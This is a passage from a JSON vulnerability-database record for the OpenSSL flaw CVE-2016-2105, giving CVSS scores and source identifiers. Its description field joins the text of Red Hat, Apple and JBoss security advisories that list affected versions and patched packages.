            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2016-2105",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-90924",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2016-2105",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-2105",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201605-081",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-90924",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data. OpenSSL is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer.. \nAttackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. \nFollowing product versions are affected:\nOpenSSL versions 1.0.2 prior to 1.0.2h\nOpenSSL versions 1.0.1 prior to 1.0.1t. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: openssl security update\nAdvisory ID:       RHSA-2016:0996-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-0996.html\nIssue date:        2016-05-10\nCVE Names:         CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 \n                   CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 \n                   CVE-2016-2842 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. An attacker could use this flaw to create a specially crafted\ncertificate which, when verified or re-encoded by OpenSSL, could cause it\nto crash, or execute arbitrary code using the permissions of the user\nrunning an application compiled against the OpenSSL library. \n(CVE-2016-2105, CVE-2016-2106)\n\n* It was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when the connection used the\nAES CBC cipher suite and the server supported AES-NI. A remote attacker\ncould possibly use this flaw to retrieve plain text from encrypted packets\nby using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)\n\n* Several flaws were found in the way BIO_*printf functions were\nimplemented in OpenSSL. Applications which passed large amounts of\nuntrusted data through these functions could crash or potentially execute\ncode with the permissions of the user running such an application. \n(CVE-2016-0799, CVE-2016-2842)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107,\nand CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat),\nHanno B\u00f6ck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842,\nCVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as\nthe original reporter of CVE-2016-2107. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz\n6dbI0EemYRoHCDagPHSycq4=\n=g2Zb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the following:\n\napache_mod_php\nAvailable for:  \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to determine kernel memory layout\nDescription:  An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription:  An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to cause a system denial of service\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription:  An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to view sensitive user information\nDescription:  A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to elevate privileges\nDescription:  An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription:  User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to cause a denial of service\nDescription:  A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  A use-after-free was addressed through improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to cause a system denial of service\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  An application may be able to execute arbitrary code with\nroot privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription:  An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  Multiple vulnerabilities in libxml2\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  Multiple vulnerabilities in libxslt\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription:  A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to cause a denial of service\nDescription:  A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to gain root privileges\nDescription:  A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A user\u0027s password may be visible on screen\nDescription:  An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local application may be able to access the process list\nDescription:  An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nThis release includes bug fixes and enhancements, as well as a new release\nof OpenSSL that addresses a number of outstanding security flaws. For\nfurther information, see the knowledge base article linked to in the\nReferences section. \n(CVE-2016-2108)\n\n* Multiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3195)\n\n* A flaw was found in the way the TLS protocol composes the Diffie-Hellman\nexchange (for both export and non-export grade cipher suites). An attacker\ncould use this flaw to downgrade a DHE connection to use export-grade key\nsizes, which could then be broken by sufficient pre-computation. This can\nlead to a passive man-in-the-middle attack in which the attacker is able to\ndecrypt all traffic. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-2109)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update)",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "BID",
        "id": "89757"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "139167"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
